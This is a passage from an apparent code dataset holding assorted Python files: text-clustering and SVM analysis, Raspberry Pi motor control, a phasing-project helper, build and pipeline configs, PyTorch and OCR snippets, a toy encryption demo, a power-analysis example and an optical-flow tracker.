label in zip(\n input_column, df['complaint_id'])]\n \nmodel = doc2vec.Doc2Vec(docs, size = 100, window = 8, min_count = 10, workers = 4)\n\n# Find similar documents\nnew_doc = df['nc'][2]\nnew_vector = model.infer_vector(new_doc)\nsims = model.docvecs.most_similar([new_vector])\n\n#%% K-MEANS CLUSTERING OF DOCUMENT VECTORS - SKIP NOW\n\nfrom sklearn.cluster import KMeans\nfrom sklearn import preprocessing\n\nn_clusters = 409\nX = np.array(model.docvecs)\nX_norm = preprocessing.normalize(X, norm='l2')\nkm = KMeans(n_clusters=n_clusters).fit(X_norm)\n\nl = km.labels_\ndf['km_labels'] = l\n\ng = df.groupby('km_labels')\n\nfor name,group in g:\n print(group[['company','product']])\n print()\n\n#%% CLASSIFICATION WITH SVM - PRODUCTS\n \n# In 2000-row sample, 409 unique companies and 17 unique products\n \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\n# Define data and targets\nX = np.array(model.docvecs)\nX_norm = preprocessing.normalize(X, norm='l2')\ny = np.array(df['product'])\nX_train, X_test, y_train, y_test = train_test_split(X_norm, y, test_size=0.3, random_state=0)\n\n# Train\nclf = SVC()\nclf.fit(X_train, y_train) \n\nclf.score(X_test, y_test)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"src/CFPB_main.py","file_name":"CFPB_main.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"56722089","text":"\"\"\" Imports \"\"\"\nimport logging\nimport threading\nimport time\nimport RPi.GPIO as GPIO\n\n\nclass Turn(object):\n \"\"\" Turn class \"\"\"\n STEP_PINS_RIGHT = [19, 20, 21, 26]\n STEP_PINS_LEFT = [17, 22, 23, 24]\n\n def __init__(self):\n logging.basicConfig(\n format='[%(levelname)s] (%(threadName)-10s) %(message)s',)\n\n self.direction = 1 # forward\n self.drive_time = 1 # seconds\n self.wait_time = 1 / float(1000) # speedunit\n\n def worker(self, pins, waittime, move_dir):\n \"\"\" The worker \"\"\"\n # Use BCM GPIO 
references\n        # instead of physical pin numbers\n        GPIO.setmode(GPIO.BCM)\n\n        # Define advanced sequence\n        # as shown in manufacturers datasheet\n        seq = [[1, 0, 0, 1],\n               [1, 0, 0, 0],\n               [1, 1, 0, 0],\n               [0, 1, 0, 0],\n               [0, 1, 1, 0],\n               [0, 0, 1, 0],\n               [0, 0, 1, 1],\n               [0, 0, 0, 1]]\n\n        step_count = len(seq)\n        logging.info('Starting thread')\n        cur_thr = threading.currentThread()\n\n        # Set all pins as output\n        for pin in pins:\n            logging.debug('Setup pins')\n            GPIO.setup(pin, GPIO.OUT)\n            GPIO.output(pin, False)\n        counter = 0\n        while getattr(cur_thr, \"do_run\", True):\n\n            logging.debug(counter)\n            logging.debug(seq[counter])\n\n            for pin in range(0, 4):\n                xpin = pins[pin]  # Get GPIO\n                if seq[counter][pin] != 0:\n                    logging.debug('Enable GPIO %i', xpin)\n                    GPIO.output(xpin, True)\n                else:\n                    GPIO.output(xpin, False)\n\n            counter += move_dir\n\n            # If we reach the end of the sequence\n            # start again\n            if counter >= step_count:\n                counter = 0\n            if counter < 0:\n                counter = step_count + move_dir\n\n            # Wait before moving on\n            time.sleep(waittime)\n\n    def run(self):\n        \"\"\"The run method\"\"\"\n        right_thread = threading.Thread(\n            name='right_wheel',\n            target=self.worker,\n            args=(self.STEP_PINS_RIGHT, self.wait_time, self.direction,))\n        left_thread = threading.Thread(\n            name='left_wheel',\n            target=self.worker,\n            args=(self.STEP_PINS_LEFT, self.wait_time, self.direction,))\n\n        # Start main loop\n        try:\n            right_thread.start()\n            left_thread.start()\n            # drive for x seconds\n            time.sleep(self.drive_time)\n            # clean up the threads\n            right_thread.do_run = False\n            right_thread.join()\n            left_thread.do_run = False\n            left_thread.join()\n            # shut down GPIO cleanly\n            GPIO.cleanup()\n\n        except (KeyboardInterrupt, SystemExit):\n            # shut down GPIO cleanly\n            GPIO.cleanup()\n\n    def left(self, sec):\n        \"\"\"Move left\"\"\"\n        self.direction = 1\n        self.drive_time = sec\n        self.run()\n\n    def right(self, sec):\n        \"\"\"Move right\"\"\"\n        self.direction = -1\n        self.drive_time = sec\n        self.run()\n","sub_path":"autobot/turn.py","file_name":"turn.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313325720","text":"_workpath = None\n\ndef use_project(project_path):\n\tglobal _workpath\n\tif type(project_path)!=str or project_path==\"help\":\n\t\tprint(\"This function is used to switch to an existing project\")\n\t\tprint(\"  -> Input: project_path ( str, the project directory you want to switch to)\")\n\t\treturn\n\timport os\n\timport sys\n\ttemp = None\n\tif project_path[0] == '/' or project_path[0:2] == '~/':\n\t\ttemp = os.path.abspath(project_path)\n\t\tif os.path.exists(temp):\n\t\t\t_workpath = temp\n\t\telse:\n\t\t\traise ValueError(\"The project \" + temp + \" doesn't exist. Exit\")\n\telse:\n\t\tnowfolder = os.path.abspath(sys.path[0])\n\t\ttemp = os.path.join(nowfolder, project_path)\n\t\tif os.path.exists(temp):\n\t\t\t_workpath = os.path.abspath(temp)\n\t\telse:\n\t\t\traise ValueError(\"The project \" + temp + \" doesn't exist. 
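# Aside on the worker loop in turn.py above: the direction handling reduces to a counter
# that wraps in either direction over the 8-entry half-step sequence. A standalone
# illustration of just that counter logic:
SEQ_LEN = 8

def next_step(counter, move_dir):
    # move_dir is +1 (forward) or -1 (reverse), matching Turn.direction
    counter += move_dir
    if counter >= SEQ_LEN:
        counter = 0
    if counter < 0:
        counter = SEQ_LEN + move_dir   # wraps to 7 when reversing, as in worker()
    return counter

assert next_step(SEQ_LEN - 1, 1) == 0 and next_step(0, -1) == SEQ_LEN - 1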
Exit\")\n\ndef new_project(data_mask_path, path=None, name=None):\n\tglobal _workpath\n\timport sys\n\timport os\n\tif type(data_mask_path)!=list or data_mask_path == \"help\":\n\t\tprint(\"This function is used to create a new project directory at your given path\")\n\t\tprint(\" -> Input: data_mask_path (list, [data_path, user_mask_path])\")\n\t\tprint(\" *option: path (create work directory at your give path, default as current dir)\")\n\t\tprint(\" *option: name (give a name to your project, default is an number)\")\n\t\tprint(\"[Notice] Your original intensity file should be 3D matrix '.npy' or '.mat' or '.bin', mask file must be 'npy'\")\n\t\tprint(\" Leave data_mask_path[1] to None if you don't have user mask\")\n\t\tprint(\"[Notice] 'path' must be absolute path !\")\n\t\treturn\n\tdata_path = data_mask_path\n\timport subprocess\n\timport numpy as np\n\tcode_path = __file__.split('/phase2d.py')[0]\n\tif not os.path.exists(data_path[0]):\n\t\traise ValueError(\"\\nYour data path is incorrect. Try ABSOLUTE PATH. Exit\\n\")\n\tif data_path[1] is not None and not os.path.exists(data_path[1]):\n\t\traise ValueError(\"\\nYour mask path is incorrect. Try ABSOLUTE PATH. Exit\\n\")\n\tif path == None or path == \"./\":\n\t\tpath = os.path.abspath(sys.path[0])\n\telse:\n\t\tif not os.path.exists(path):\n\t\t\traise ValueError('\\n Your path is incorrect. Try ABSOLUTE PATH. Exit\\n')\n\t\telse:\n\t\t\tpath = os.path.abspath(path)\n\tif name is not None:\n\t\t_workpath = os.path.join(path, name)\n\telse:\n\t\tall_dirs = os.listdir(path)\n\t\tnid = 0\n\t\tfor di in all_dirs:\n\t\t\tif di[0:8] == \"phase2d_\" and str.isdigit(di[8:]):\n\t\t\t\tnid = max(nid, int(di[8:]))\n\t\tnid += 1\n\t\t_workpath = os.path.join(path, 'phase2d_' + format(nid, '02d'))\n\tcmd = code_path + '/template_2d/new_project ' + _workpath\n\tsubprocess.call(cmd, shell=True)\n\t# now load data\n\tif data_path[0].split('.')[-1] == 'npy':\n\t\tdata = np.load(data_path[0])\n\t\tdata.tofile(_workpath+'/ori_intens/pattern.bin')\n\telif data_path[0].split('.')[-1] == 'bin':\n\t\tcmd = 'cp ' + data_path[0] + ' ' + _workpath + '/ori_intens/pattern.bin'\n\t\tsubprocess.call(cmd, shell=True)\n\telif data_path[0].split('.')[-1] == 'mat':\n\t\timport scipy.io as sio\n\t\tdfile = sio.loadmat(data_path[0])\n\t\tdata = dfile.values()[0]\n\t\tdata.tofile(_workpath+'/ori_intens/pattern.bin')\n\telse:\n\t\traise ValueError('\\n Error while loading your data ! Exit\\n')\n\tcmd = 'ln -fs ' + _workpath + '/ori_intens/pattern.bin ' + _workpath + '/data.bin'\n\tsubprocess.call(cmd, shell=True)\n\t# now load mask data\n\tif data_path[1] is not None:\n\t\tcmd = 'cp ' + data_path[1] + ' ' + _workpath + '/ori_intens/mask.npy'\n\t\tsubprocess.call(cmd, shell=True)\n\t\tcmd = 'ln -fs ' + _workpath + '/ori_intens/mask.npy ' + _workpath + '/mask.npy'\n\t\tsubprocess.call(cmd, shell=True)\n\t# now change output|path in config.ini\n\timport ConfigParser\n\tconfig = ConfigParser.ConfigParser()\n\tconfig.read(os.path.join(_workpath, 'config.ini'))\n\tconfig.set('output', 'path', _workpath)\n\tconfig.set('input', 'fnam', os.path.join(_workpath,'data.bin'))\n\tif data_path[1] is not None:\n\t\tconfig.set('input', 'user_mask', os.path.join(_workpath,'mask.npy'))\n\telse:\n\t\tconfig.set('input', 'user_mask', 'None')\n\twith open(os.path.join(_workpath, 'config.ini'), 'w') as f:\n\t\tconfig.write(f)\n\t# done\n\tprint(\"\\nAll work done ! \")\n\tprint(\"Now please confirm running parameters. Your can re-edit it by calling function phase2d.config(...) 
or edit config.ini directly.\n\")\n\ndef config(params):\n\tglobal _workpath\n\tif params == {} or type(params)!=dict:\n\t\tprint(\"This function is used to edit the configure file\")\n\t\tprint(\"  -> Input (dict, parameters you want to modify.)\")\n\t\tprint(\"params format : \")\n\t\tprint(\"       {\\n\\\n\t\t\t\t\t'input|shape' : '120, 120', \\n\\\n\t\t\t\t\t'input|padd_to_pow2' : 'True', \\n\\\n\t\t\t\t\t... \\n\\\n\t\t\t\t\t}\")\n\t\tprint(\"You can look into 'config.ini' for detailed information\")\n\t\treturn\n\timport os\n\tif not os.path.exists(os.path.join(_workpath,'config.ini')):\n\t\traise ValueError(\"I can't find your configure file, please run phase2d.new_project(...) first !\")\n\timport ConfigParser\n\tconfig = ConfigParser.ConfigParser()\n\tconfig.read(os.path.join(_workpath,'config.ini'))\n\tfor k in params.keys():\n\t\tsection, par = k.split(\"|\")\n\t\tconfig.set(section, par, params[k])\n\twith open(os.path.join(_workpath,'config.ini'), 'w') as f:\n\t\tconfig.write(f)\n\tprint('\\n Configure finished.')\n\ndef run(nohup=False):\n\tglobal _workpath\n\tif type(nohup)!=bool:\n\t\tprint(\"Call this function to start phasing\")\n\t\tprint(\"  -> Input: num_proc (int, how many processes to run in parallel, default=1)\")\n\t\tprint(\"            nohup (bool, whether to run it in the background, default=False)\")\n\t\treturn\n\timport os\n\timport subprocess\n\tif not os.path.exists(os.path.join(_workpath,'config.ini')):\n\t\traise ValueError(\"Please call phase2d.new_project(...) and phase2d.config(...) first ! Exit\")\n\timport sys\n\tcode_path = __file__.split('/phase2d.py')[0] + '/template_2d'\n\tif nohup == True:\n\t\tcmd = \"python \" + os.path.join(code_path,'make_input.py') + ' '+ os.path.join(_workpath,'config.ini') + ' >' + os.path.join(_workpath,'make_input.log')\n\telse:\n\t\tcmd = \"python \" + os.path.join(code_path,'make_input.py') + ' '+ os.path.join(_workpath,'config.ini')\n\tsubprocess.check_call(cmd, shell=True)\n\tif nohup == True:\n\t\tcmd = \"python \" + os.path.join(code_path, 'phase.py') + ' ' + os.path.join(_workpath, 'input.h5') + ' &>' + os.path.join(_workpath, 'phase.log') + '&'\n\telse:\n\t\tcmd = \"python \" + os.path.join(code_path, 'phase.py') + ' ' + os.path.join(_workpath, 'input.h5')\n\tsubprocess.check_call(cmd, shell=True)\n\ndef show_result(outpath=None, exp_param=None):\n\tglobal _workpath\n\tif type(outpath)==str and outpath == \"help\":\n\t\tprint(\"This function is used to plot phasing results in a figure\")\n\t\tprint(\"  -> Input: \")\n\t\tprint(\"     *option: outpath (IF you move output.h5 to another folder, please give me its path)\")\n\t\tprint(\"     *option: exp_param (list detd, lambda, det_r, pix_size in a string. Used to calculate q value.\")\n\t\tprint(\"               e.g. '200,2.5,128,0.3'. If you don't need q info, leave it as default (None))\")\n\t\treturn\n\tif outpath is not None and type(outpath)!=str:\n\t\traise ValueError(\"Input 'outpath should be a string. 
Exit'\")\n\timport sys\n\timport os\n\timport subprocess\n\tcode_path = __file__.split('/phase2d.py')[0] + '/template_2d'\n\n\tif outpath is None:\n\t\tcmd = \"python \" + os.path.join(code_path, 'show_result.py') + ' ' + os.path.join(_workpath, 'output.h5')\n\telse:\n\t\tcmd = \"python \" + os.path.join(code_path, 'show_result.py') + ' ' + outpath\n\tif exp_param is not None:\n\t\tcmd = cmd + ' ' + str(exp_param)\n\n\tsubprocess.check_call(cmd, shell=True)\n","sub_path":"phase/phase2d.py","file_name":"phase2d.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"447845290","text":"###############################################################################\n# Unpublished Work Copyright (c) 2011-2012\n# Trading Technologies International, Inc.\n# All Rights Reserved Worldwide\n#\n# * * * S T R I C T L Y P R O P R I E T A R Y * * *\n#\n# WARNING: This program (or document) is unpublished, proprietary property\n# of Trading Technologies International, Inc. and is to be maintained in\n# strict confidence. Unauthorized reproduction, distribution or disclosure\n# of this program (or document), or any program (or document) derived from\n# it is prohibited by State and Federal law, and by local law outside of\n# the U.S.\n###############################################################################\n# Author: John Shaw (jshaw)\n###############################################################################\n# vim:ft=python\nImport('env')\nImport('target')\n\nlibs = [\n 'tsdb',\n 'boost_date_time',\n 'protobuf',\n 'logging',\n 'tcmalloc',\n 'profiler',\n 'zmq',\n]\n\ncpppath = [\n \"#/include\",\n \"#/../logging/include\",\n \"#/../thirdparty/boost/include\",\n \"#/../util/include\",\n]\n\nlibpath = [\n \"#/{0}\".format(target),\n \"#/../logging/lib\",\n \"#/../thirdparty/boost/lib\",\n \"#/../thirdparty/zeromq/lib\",\n]\n\nenv = env.Clone(CPPPATH=cpppath, LIBPATH=libpath)\nenv.Append(LIBS=libs)\n\nenv.Program(\"dbtest\", \"test.cpp\")\nenv.Program(\"dbbench\", \"bench.cpp\")\n","sub_path":"dashboard/services/tsdb/debug/dbtest/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445265997","text":"# General settings\n\n#### REQUIRED ####\n\n'''\nPath to the csv file with information about the samples to run.\nSee an example in './inputs/experiment_info.csv', and descriptions\nof columns are in the README. \nPaths can be either relative or absolute, but cannot contain spaces. \n'''\ninfo_file = \"./JTG-E86_input.csv\"\n\n'''\nPath to a folder containing the read files. Can be relative or absolute. \nRead files can be either zipped (.fastq.gz) or unzipped (.fastq)\nEither the containing folder or the filename must begin with\nthe sample identifier. \nEx. When processing sample 'A234', the pipeline will find the following: \n- 'read_files_dir/A234_L001-ds.aaa/other_filename.fastq.gz'\n- 'read_files_dir/A234_L001_R1_001.fastq'\n- 'read_files_dir/other_foldername/A234_L001_R1_001.fastq.gz'\n'''\nread_files_dir = '../ngs_run_220711/'\n\n\n#### DEBUGGING SETTINGS ####\n\n'''\nIntermediate files are created at different steps of processing. \nSetting this to false will keep these files for debugging or looking\ndeeper at some filtered reads. \nNormally, these files are deleted to save space. 
\n'''\ndelete_intermediates = True\n\n\n#### SENSITIVITY AND SYSTEM SETTINGS ####\n\n'''\nThe Qscore_threshold to use. This must be defined. \nUse -1 to not filter any reads. \nReads with <50% bases passing threshold are filtered. \n'''\nQscore_threshold = 20\n\n# The length of the sequence to match to the target files\ntransposon_end_flanking_sequence_length = 17\n\n# The number of bases duplicated by transposon insertion\ntarget_site_duplication_length = 5\n\n\n#### GRAPHING SETTINGS ####\n\n# General matplotlib settings\nplots_filetype = 'svg'\nplots_dpi = 600\nfig_size_inches = [8.9, 3.1]\n\n# Bin size for genome-wide plots, in base pairs\ngenome_bin_size = 5000\n\n# Percent of reads at which to cap the y-axis on the zoomed in histogram\n# to show low-level reads\nlow_reads_cap_percent = 0.50\n\n# On-target calculated window in the transposition distance histogram\non_target_window = 200\n","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"361764156","text":"import torch\nimport torch.nn as nn\n\nclass Encoder(nn.Module):\n\n def __init__(self):\n super(Encoder, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Linear(1000, 500),\n nn.LeakyReLU()\n )\n\n self.layer2 = nn.Sequential(\n nn.Linear(500, 200),\n nn.LeakyReLU()\n )\n\n self.layer3 = nn.Sequential(\n nn.Linear(200, 100),\n nn.LeakyReLU()\n )\n\n # self.layer1 = nn.Sequential(\n # nn.Conv1d(1, 16, 21, 1, 0),\n # nn.BatchNorm1d(16),\n # nn.LeakyReLU()\n # )\n #\n # self.max_pool = nn.MaxPool1d(2)\n #\n # self.layer2 = nn.Sequential(\n # nn.Conv1d(16, 32, 11, 1, 0),\n # nn.BatchNorm1d(32),\n # nn.LeakyReLU()\n # )\n #\n # self.layer3 = nn.Sequential(\n # nn.Conv1d(32, 64, 21, 1, 0),\n # nn.BatchNorm1d(64),\n # nn.LeakyReLU()\n # )\n #\n # self.\n\n\n # self.fc1 =\n\n def forward(self, input):\n #input :: 1000 x 1\n x = self.layer1(input)\n # print('... 1', x.size())\n # x = self.max_pool(x)\n # print('.. max pool .. ', x.size())\n x = self.layer2(x)\n # print('... 2', x.size())\n x = self.layer3(x)\n # x = self.max_pool(x)\n # print('... 
3', x.size())\n return x\n\n\n\nclass Generator(nn.Module):\n\n def __init__(self, singer):\n super(Generator, self).__init__()\n self.singer = singer\n\n self.layer1 = nn.Sequential(\n nn.Linear(100, 200),\n nn.LeakyReLU()\n )\n\n self.layer2 = nn.Sequential(\n nn.Linear(200, 500),\n nn.LeakyReLU()\n )\n\n self.layer3 = nn.Sequential(\n nn.Linear(500, 1000),\n )\n\n self.bn = nn.BatchNorm1d(1)\n\n def forward(self, input):\n # x = self.bn(input.unsqueeze(1))\n # x = x.squeeze(1)\n x = self.layer1(input)\n x = self.layer2(x)\n x = self.layer3(x)\n x = nn.Tanh()(x)\n return x\n\n\nclass Discriminator():\n def __init__(self, singer):\n pass\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"492058555","text":"from paddleocr import PaddleOCR\nfrom tools.infer.utility import draw_ocr\nfrom PIL import Image\n\ndef one_pred(img_path):\n ocr = PaddleOCR(use_angle_cls=True, lang=\"ch\")\n result = ocr.ocr(img_path, cls=True)\n image = Image.open(img_path).convert('RGB')\n boxes = [line[0] for line in result]\n txts = [line[1][0] for line in result]\n scores = [line[1][1] for line in result]\n im_show = draw_ocr(image, boxes, txts, scores, font_path='/doc/simfang.ttf')\n im_show = Image.fromarray(im_show)\n\n n = 0\n stR=\"\"\n for line in result:\n #print(line[1])\n n += 1\n texts = line[1][0]\n stR = stR + \",\" + str(texts)\n #print(texts)\n print(stR)\n im_show.show()\n return stR\n#\n# path1 = r'img\\10.png'\n# path2 = r'img\\11.png'\n# text = one_pred(path1)\n\n\n","sub_path":"fnayi.py","file_name":"fnayi.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454793972","text":"from turtle import *\n\ndef draw_star(x, y, length):\n penup()\n goto(x, y)\n pendown()\n left(36)\n for _ in range(5):\n forward(length)\n left(144)\n\nspeed(-1)\nfor i in range(100):\n import random\n colors = ['blue', 'red', 'pink', 'orange', 'yellow', 'violet']\n color(random.choice(colors))\n x = random.randint(-300, 300) #random from -300 to 300\n y = random.randint(-300, 300)\n length = random.randint(3, 10)\n draw_star(x, y, length)\n\nmainloop()\n","sub_path":"lab3/homework/ex5_6.py","file_name":"ex5_6.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448983508","text":"# Model a 2-alternative forced choice task.\n# Expectation: 80% of participants will succeed.\n# Analysis: a one-tailed binomial test.\n\n# This file contains three sections:\n# quick version shows the most efficient way to implement the experiment.\n# argument version shows how to use arguments to tweak the parameters.\n# detailed version shows a very inefficient way to implement the\n# experiment, but it gives more insight into how Bunny works.\n\nfrom Bunny import *\n\n#################\n# QUICK VERSION #\n#################\n\n# Create a binomial agent with probability of success = 0.8\nBehavior = Participant(Behaviors.BernoulliAgent(0.8))\n# Create a DataTest that runs a binomial test\nTest = DataTest(Tests.BinomialTest(\"OT\"))\n# Create an experiment object\nMyExperiment = Experiment(Behavior, Test, \"2-AFC task\")\n# Explore relation between sample size and power\nExplore(MyExperiment)\n# Find a sample size given your power\nMyExperiment.SetPower(0.95)\nHop(MyExperiment)\n# Visualize your experiment's 
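# What Explore/Imagine estimate in the 2-AFC script above is statistical power. A
# library-free sketch of simulated power for this design (assumed mechanics; Bunny's
# internals may differ; math.comb needs Python 3.8+):
import random
from math import comb

def p_at_least(s, n, p=0.5):
    # one-tailed binomial tail: P(X >= s) under the chance model
    return sum(comb(n, k) * p**k * (1 - p)**(n - k) for k in range(s, n + 1))

def simulated_power(n, p_true=0.8, alpha=0.05, sims=2000):
    wins = sum(p_at_least(sum(random.random() < p_true for _ in range(n)), n) < alpha
               for _ in range(sims))
    return wins / sims   # simulated_power(16) comes out near 0.8 for this design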
power given a sample size\nMyExperiment.SetSampleSize(16)\n# Visualize experiment's power using 100,000 simulations\nImagine(MyExperiment, samples=100000)\n\n####################\n# DETAILED VERSION #\n####################\n\n# Create a function that returns success with probability = 0.8\nBehaviorModel = Behaviors.BernoulliAgent(0.8)\n# Option 1: Create a participant object and send the behavior model as an\n# argument\nBehavior = Participant(BehaviorModel)\n# Option 2: Create an empty participant object and add the behavior model later\nBehavior = Participant()\nBehavior.SetBehavior(BehaviorModel)\n\n# Load a function that runs a binomial test\nMyTest = Tests.BinomialTest(\"OT\")\n# Option 1: Create a datatest object and send the DataTest as an argument\nTest = DataTest(MyTest)\n# Option 2: Create an empty DataTest object and add the binomial test later\nTest = DataTest()\nTest.SetTest(MyTest)\n\n# Create an experiment object\nMyExperiment = Experiment(Behavior, Test, \"2-AFC task\")\n# See quick version section above for examples of what you can do with\n# the experiment object.\n","sub_path":"Bunny/Examples/2AFC_task.py","file_name":"2AFC_task.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"378635337","text":"from random import randint\n\ndef egcd(a, b):\n    if a == 0:\n        return (b, 0, 1)\n    else:\n        g, y, x = egcd(b % a, a)\n        return (g, x - (b // a) * y, y)\n\ndef modinv(a, m):\n    g, x, y = egcd(a, m)\n    if g != 1:\n        raise Exception('modular inverse does not exist')\n    else:\n        return x % m\n\ndef decrypt(message, p, q, y):\n    #rp = (p + 1 // 4)\n    #rp = rp**(len(message))\n    #rp = y**rp\n    rp = pow(y, ((p+1)//4)**(len(message)), p)\n\n    #print(rp)\n\n    #rq = (q + 1 // 4)\n    #rq = rq**(len(message))\n    rq = pow(y, ((q+1)//4)**(len(message)), q)\n\n    #print(rq)\n\n    x0 = (q * modinv(q, p) * rp + p * modinv(p, q) * rq) % (p * q)\n\n\n    print(x0)\n\n    plaintext, y = encrypt(message, p*q)  # XOR with the same keystream restores the plaintext\n\n    print(plaintext)\n    \n\ndef encrypt(message, public_key):\n    keystream = []\n    x_vals = []\n    ciphertext = \"\"\n\n    x_vals.append(159201)\n\n    r = randint(0, public_key)\n\n    for i in range(0, 
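# Why decrypt() above can simply call encrypt() again: the keystream XOR is an involution,
# so applying the same Blum-Blum-Shub stream to the ciphertext undoes the encryption (the
# x0 seed-recovery math only matters when the seed is not fixed). Standalone check:
def xor_stream(bits, keystream):
    return ''.join(str(int(b) ^ k) for b, k in zip(bits, keystream))

ks = [1, 0, 1, 1, 0]
ct = xor_stream('10011', ks)
assert xor_stream(ct, ks) == '10011'   # applying the same stream twice restores the input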
len(message)):\n result = x_vals[i] ** 2\n result = result % public_key\n x_vals.append(result)\n\n print (x_vals)\n# print (\"len of x_vals:\", len(x_vals))\n# print (\"len of n:\", len(message))\n\n for i in range(0, len(x_vals)):\n keystream.append(x_vals[i] & 1)\n\n print (keystream)\n print (\"len of keystream: \", len(keystream))\n\n for i in range(0, len(message)):\n ciphertext += str(keystream[i] ^ int(message[i]))\n \n print (ciphertext)\n return (ciphertext, x_vals[len(x_vals)-1])\n\n\nn = 499 * 547\n\nplaintext = \"10011100000100001100\"\nprint (\"plaintext: \", plaintext)\n\nciphertext, y = encrypt(\"10011100000100001100\", n)\n\ndecrypt(ciphertext, 499, 547, y)\n","sub_path":"bg.py","file_name":"bg.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499926954","text":"class Solution(object):\r\n def combinationSum4(self, nums, target):\r\n\r\n # recursive\r\n\r\n '''if target == 0:\r\n return 1\r\n\r\n count = 0\r\n for i in range(len(nums)):\r\n if target >= nums[i]:\r\n count += self.combinationSum4(nums,target - nums[i])\r\n\r\n return count'''\r\n\r\n # top down dp\r\n '''dp = [-1]*(target+1)\r\n dp[0] = 1\r\n\r\n def helper(nums,target):\r\n if dp[target]!= -1:\r\n return dp[target]\r\n\r\n count = 0\r\n for i in range(len(nums)):\r\n if target >= nums[i]:\r\n count += helper(nums,target-nums[i])\r\n\r\n dp[target] = count\r\n #print(dp)\r\n return count\r\n\r\n\r\n return helper(nums,target)'''\r\n\r\n # bottom up dp\r\n dp = [0]*(target+1)\r\n dp[0] = 1\r\n\r\n for tg in range(1,len(dp)):\r\n for j in range(len(nums)):\r\n if tg - nums[j] >=0:\r\n dp[tg] += dp[tg-nums[j]]\r\n print(dp)\r\n\r\n return dp[-1]\r\n\r\n \r\n \r\n\r\nif __name__ == '__main__':\r\n test = Solution()\r\n print(test.combinationSum4([1,2,3],4))\r\n","sub_path":"combinationSum4.py","file_name":"combinationSum4.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"320870211","text":"import os\nimport math\nimport cv2\nimport numpy as np\nfrom view_database import read_rect, draw_circle\n\n\nclass lk_tracker(object):\n def __init__(self, image, rect):\n self.old_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n self.fp = cv2.goodFeaturesToTrack(self.old_image, mask=None, maxCorners=200, qualityLevel=0.001, minDistance=9,\n blockSize=40)\n\n self.radius = 150\n self.rect = rect[0]\n self.cx = 0.5 * (self.rect[0] + self.rect[2])\n self.cy = 0.5 * (self.rect[1] + self.rect[3])\n a = []\n for x, y in self.fp[:, 0]:\n r = math.sqrt((x - self.cx) * (x - self.cx) + (y - self.cy) * (y - self.cy))\n if r < self.radius:\n a.append([x, y])\n b = np.array(a)\n self.fp = b.reshape(-1,1,2)\n self.new_image = None\n self.lk_params = dict(winSize=(30, 30),\n maxLevel=4,\n criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n\n self.p1 = None\n self.p2 = None\n self.status = None\n self.error = None\n\n def track(self, image):\n self.new_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n if self.fp.size > 0:\n self.p1, self.status, self.error = cv2.calcOpticalFlowPyrLK(self.old_image, self.new_image, self.fp,\n None, **self.lk_params)\n self.old_image = self.new_image.copy()\n\n good_new = self.p1[self.status == 1]\n good_old = self.fp[self.status == 1]\n\n dx = 0\n dy = 0\n for i in range(len(good_new)):\n dx += (good_new[i][0] - good_old[i][0])\n dy += (good_new[i][1] - good_old[i][1])\n\n l = 
np.shape(good_old)[0]\n dx = dx / l\n dy = dy / l\n\n self.cx += dx\n self.cy += dy\n\n self.p2 = self.fp.copy()\n self.fp = good_new.reshape(-1, 1, 2)\n\n\n\n def draw(self, image):\n cv2.rectangle(image, (int(self.rect[0]), int(self.rect[1])),\n (int(self.rect[2]), int(self.rect[3])), (255, 255, 0))\n w = (self.rect[2] - self.rect[0]) / 2\n h = (self.rect[3] - self.rect[1]) / 2\n cv2.rectangle(image, (int(self.cx - w), int(self.cy - h)),\n (int(self.cx + w), int(self.cy + h)), (255, 255, 255))\n cv2.circle(image, (int(self.cx), int(self.cy)), self.radius, (255, 255, 255))\n if self.p1 is not None:\n i = 0\n for x, y in self.p1[:, 0]:\n xy = self.p2[i][0]\n cv2.circle(image, (x, y), 3, (0, 255, 255), -1)\n cv2.line(image, (x, y), (xy[0], xy[1]), (0, 0, 255))\n i += 1\n if self.p2 is not None:\n for x, y in self.p2[:, 0]:\n cv2.circle(image, (x, y), 3, (0, 255, 0), -1)\n\n\ndef view_track(path):\n tracker = None\n for f in os.listdir(path):\n f = os.path.join(path, f)\n baseName, ext = os.path.splitext(f)\n if ext == '.jpg':\n rect = read_rect(f)\n image = cv2.imread(f)\n if tracker is None:\n tracker = lk_tracker(image, rect)\n else:\n tracker.track(image)\n tracker.draw(image)\n if not rect is None:\n draw_circle(rect, image)\n cv2.imshow(\"track\", image)\n key = cv2.waitKey(0)\n if key == 27:\n break\n\n\nif __name__ == '__main__':\n path = \"G:\\\\database\\\\fluovisor\\\\track00029\\\\\"\n 